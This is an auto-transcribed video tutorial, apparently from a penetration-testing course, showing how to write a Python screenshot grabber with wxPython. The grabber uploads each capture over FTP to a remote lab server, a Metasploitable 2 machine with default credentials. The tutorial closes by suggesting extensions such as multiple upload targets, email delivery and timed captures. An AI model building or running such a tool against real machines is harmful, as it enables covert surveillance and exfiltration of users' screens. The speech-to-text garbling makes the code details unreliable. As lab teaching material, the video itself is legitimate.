1
00:00:00,510 --> 00:00:04,260
In this video you're going to learn how to grab screenshots with Python.

2
00:00:04,590 --> 00:00:11,160
Additionally once the screenshot is grab we'll go to feature to send itself on a remote location such

3
00:00:11,160 --> 00:00:15,400
as uploading itself to an FTB server.

4
00:00:15,400 --> 00:00:21,600
Now this is very useful in scenarios where you need to conduct a lot of information gathering not all

5
00:00:21,600 --> 00:00:24,390
scenarios rely heavily on information gathering.

6
00:00:24,420 --> 00:00:30,850
Even though this is part of the penetration testing methodology so this is really the case for specificity.

7
00:00:30,990 --> 00:00:37,560
Now in python there are many libraries that you can use to take screenshots and the one we'll be using

8
00:00:37,560 --> 00:00:39,530
here is W X Python.

9
00:00:40,140 --> 00:00:44,350
If you don't have it already and I assume you don't.

10
00:00:44,550 --> 00:00:51,540
If you don't have it already installed just open up a terminal or a command prompt command prompt.

11
00:00:51,540 --> 00:00:53,870
In my case and do that for a bit.

12
00:00:53,890 --> 00:00:58,440
3 installed w x Python

13
00:01:02,130 --> 00:01:04,260
great with that out of the way.

14
00:01:04,350 --> 00:01:16,890
Let's actually get into the coding so we first start by importing w x python with W X and we also need

15
00:01:16,890 --> 00:01:23,320
the OS and the SDP lib modules.

16
00:01:23,340 --> 00:01:29,760
Now for those of you who don't know w x Python is a library that's heavily used in coding graphical

17
00:01:29,760 --> 00:01:35,250
applications or goofy applications with Python such as Windows applications for example.

18
00:01:35,250 --> 00:01:39,540
It's a similar to to get enter which is another goofy python library.

19
00:01:39,540 --> 00:01:47,970
However I'd like to think that's more developed than ticket into OK so to build our screen grab or screenshot

20
00:01:48,140 --> 00:01:58,260
grabber will first need to actually instantiate a W X app and we do that with W X not that so we have

21
00:01:58,260 --> 00:02:03,050
a variable w which instantiate a W x.

22
00:02:03,810 --> 00:02:10,800
And then we also need another variable to make a call to screen the C method that enables us to get

23
00:02:10,800 --> 00:02:18,810
the screen so we'll say screen equals w x screen DC.

24
00:02:18,840 --> 00:02:24,540
Now I won't go into details in any of these particular methods because there are entire books written

25
00:02:24,540 --> 00:02:29,530
on w x Python here I will just use them conveniently.

26
00:02:29,610 --> 00:02:38,010
Okay now we need to create an empty bitmap sort of like you can think of in a bitmap in this case like

27
00:02:38,100 --> 00:02:41,270
a canvas that has the size of the screen.

28
00:02:41,430 --> 00:02:46,710
So first we'll say size equals screen

29
00:02:49,710 --> 00:02:51,000
yet.

30
00:02:51,150 --> 00:02:54,940
Sighs OK.

31
00:02:55,640 --> 00:03:07,800
Then the map equals w x then map size zero.

32
00:03:08,000 --> 00:03:10,830
And also size 1.

33
00:03:10,860 --> 00:03:17,620
The next thing we need is a memory device context to enable us to draw graphics onto the map.

34
00:03:17,670 --> 00:03:18,960
We've just created.

35
00:03:19,350 --> 00:03:27,120
So we'll say memo equals w x memory DC B map.

36
00:03:27,420 --> 00:03:31,350
So this is the parameter or the argument that we need to specify.

37
00:03:31,740 --> 00:03:36,400
And then we just copy our previous defined screen into this context.

38
00:03:36,540 --> 00:03:45,560
So we do that with the memo dot bullet 0 0 and I'll explain shortly.

39
00:03:45,780 --> 00:03:55,500
Size 0 size 1 screen 0 0.

40
00:03:56,280 --> 00:03:56,660
Okay.

41
00:03:56,690 --> 00:04:04,140
So we have the first two zeros for the X and Y positions of the destination device.

42
00:04:04,140 --> 00:04:08,970
Then we have the height the height and the width of the area.

43
00:04:08,970 --> 00:04:10,180
We copy.

44
00:04:10,350 --> 00:04:13,990
Then we have the source from what we copy which is the screen.

45
00:04:14,280 --> 00:04:18,700
And finally we have the x and y of the source device context.

46
00:04:19,230 --> 00:04:21,410
Okay so this is all interesting stuff.

47
00:04:21,450 --> 00:04:26,910
And it was quite complicated for me to wrap my head around it when I saw it the first time so don't

48
00:04:26,910 --> 00:04:29,830
get intimidated if you don't understand everything here.

49
00:04:30,210 --> 00:04:36,660
However if you want to precisely know what all these methods do in essence you can further study the

50
00:04:36,660 --> 00:04:41,090
documentation of W X python and W X python.

51
00:04:41,220 --> 00:04:41,610
Or.

52
00:04:42,150 --> 00:04:45,330
But here we just went to the straight code.

53
00:04:45,660 --> 00:04:46,180
All right.

54
00:04:46,200 --> 00:04:53,000
Now what we'll do is to delete the madam object we've created because we don't need it anymore so we'll

55
00:04:53,010 --> 00:04:56,570
say that all normal.

56
00:04:57,270 --> 00:05:06,520
And lastly we'll save the B map or B or bitmap as BMG which is more straightforward so we'll see B map

57
00:05:08,080 --> 00:05:23,610
thought save file we'll give it a name grabbed the TNG and a parameter w x that map time the engine

58
00:05:24,960 --> 00:05:27,750
which is more straightforward like I said.

59
00:05:27,780 --> 00:05:30,760
So we have the file name all right.

60
00:05:31,170 --> 00:05:37,880
And then the method w x library that defines the type we want our image to be save this.

61
00:05:38,010 --> 00:05:40,770
So it's BMG and that's it.

62
00:05:40,770 --> 00:05:46,590
Now you might be wondering or saying to herself that we had to write so many lines of code just to take

63
00:05:46,590 --> 00:05:47,250
a screenshot.

64
00:05:47,760 --> 00:05:49,780
Yes that is correct.

65
00:05:49,980 --> 00:05:55,260
And there are higher level libraries in Python such as by screenshot or others that would let you do

66
00:05:55,260 --> 00:05:57,870
the same thing in two or three lines of code.

67
00:05:57,870 --> 00:06:05,340
My purpose for this video was to go a bit deeper and actually get into the graphics of it to a certain

68
00:06:05,340 --> 00:06:06,560
extent so to speak.

69
00:06:07,240 --> 00:06:13,440
OK that said let's actually go the fun part of it which is how this screenshot will send itself over

70
00:06:13,440 --> 00:06:16,490
FTB to a remote server.

71
00:06:17,760 --> 00:06:24,720
So at the top we've imported FTB lib and first what we need to do is to create a session so let's call

72
00:06:24,720 --> 00:06:34,710
it SS underscore equals FTB lib dot FTB and then here will have to specify the IP of our machine so

73
00:06:34,740 --> 00:06:46,020
when I need to 168 let's say 0 1 and we also need to specify a user name for the FTB and a password

74
00:06:46,020 --> 00:06:54,480
for the FTB because enable to actually in order to actually be able to upload a file to the FTB server

75
00:06:54,480 --> 00:07:00,610
you need to provide credentials so NSF admin NSF adamant.

76
00:07:01,290 --> 00:07:08,280
So the FTB server will use for this purpose is a vulnerable machine called Matus portable 2 which is

77
00:07:08,610 --> 00:07:09,970
up and running here.

78
00:07:10,020 --> 00:07:13,420
So this is madness portable tool which runs the SDP server.

79
00:07:13,860 --> 00:07:14,360
OK.

80
00:07:14,370 --> 00:07:22,410
Now what we need to do is to actually open our screenshot file and read binary mode so we'll see a file

81
00:07:23,670 --> 00:07:24,690
on their score

82
00:07:27,730 --> 00:07:34,250
equals open let's say grab the DOT PMG.

83
00:07:35,140 --> 00:07:41,530
Like I said and read binary mode and then we have to send it over FTB using the method store binary

84
00:07:41,530 --> 00:07:43,760
from the FTB lib library.

85
00:07:43,820 --> 00:07:53,410
So we'll say SAS underscore a dot store binary and then we need to send the command store and we'll

86
00:07:53,470 --> 00:08:01,250
upload the file to tempi folder as grep does P G So long P G.

87
00:08:01,360 --> 00:08:10,030
And what we need to store and this DMP grab P G is whatever information is in our file on their score

88
00:08:10,510 --> 00:08:21,040
which is the screenshot with taken now as a rule of good practice we close both the file and the session

89
00:08:21,820 --> 00:08:30,130
before terminating or finishing the code for the script so we'll save file underscored close and then

90
00:08:30,640 --> 00:08:32,650
SAS on their scorecard.

91
00:08:33,820 --> 00:08:34,380
Okay.

92
00:08:34,390 --> 00:08:37,490
And that's actually pretty much it.

93
00:08:37,900 --> 00:08:44,070
Now like I said I will be demonstrating this and make sure that it all works.

94
00:08:44,080 --> 00:08:52,870
So the FTB server is up and running here and like I said it's met a split bowl too and we need to find

95
00:08:52,870 --> 00:09:04,810
its IP address with the I config as you can see it's one I need to 168 eighty five one to wait so it's

96
00:09:04,900 --> 00:09:06,330
eighty five.

97
00:09:06,700 --> 00:09:07,710
One two Wait.

98
00:09:07,720 --> 00:09:14,470
All right let's save the script then I'm going to have a command prompt and navigate to the location

99
00:09:14,470 --> 00:09:24,430
of the script and then I can simply run it with by minus three grabbed the why and if everything worked

100
00:09:24,430 --> 00:09:30,420
correctly we should have our screenshot uploaded in the tempi folder on the FTB server.

101
00:09:30,580 --> 00:09:40,960
So if I hit enter it's gonna take a screenshot and then it's going to send it over into the remote location

102
00:09:41,050 --> 00:09:42,870
in the tempi folder.

103
00:09:42,880 --> 00:09:51,750
Now if we look in the DMP folder so see these TMT there is nothing in here just some random file okay.

104
00:09:51,750 --> 00:09:54,640
And then if I run this enter

105
00:09:58,280 --> 00:10:06,890
it should take the screenshot and it should already be sent over here so if I do I'll ask once again

106
00:10:07,070 --> 00:10:10,710
we can see we have the the DOT P and G.

107
00:10:10,730 --> 00:10:20,840
If we look with Alice minus a plus minus a l more precisely we can see that is eighty one thousand bytes

108
00:10:20,840 --> 00:10:21,450
or so.

109
00:10:23,600 --> 00:10:32,300
If I look on the desktop if I hover over it it's roughly seventy nine point three which is exactly the

110
00:10:32,300 --> 00:10:37,610
same size and if I look into it there is this screenshot.

111
00:10:37,610 --> 00:10:39,260
So this was one way to go.

112
00:10:39,290 --> 00:10:43,970
A screenshot grabber that uploads itself to a remote location.

113
00:10:43,970 --> 00:10:48,500
Now make sure to study the W X by phone and the FTB libraries.

114
00:10:48,500 --> 00:10:53,290
If you want to get more in-depth understanding of how they work and what their capabilities are.

115
00:10:54,020 --> 00:11:00,320
As always you can further greatly expand the capabilities of the script by making it for example upload

116
00:11:00,320 --> 00:11:05,150
itself to multiple locations or send it to itself via email.

117
00:11:05,150 --> 00:11:12,410
You could also timestamp and take multiple free shots at multiple points in time and these are just

118
00:11:12,410 --> 00:11:20,210
a few ideas but there is a lot more this script or program can be developed than to the only limit is

119
00:11:20,210 --> 00:11:21,650
your imagination.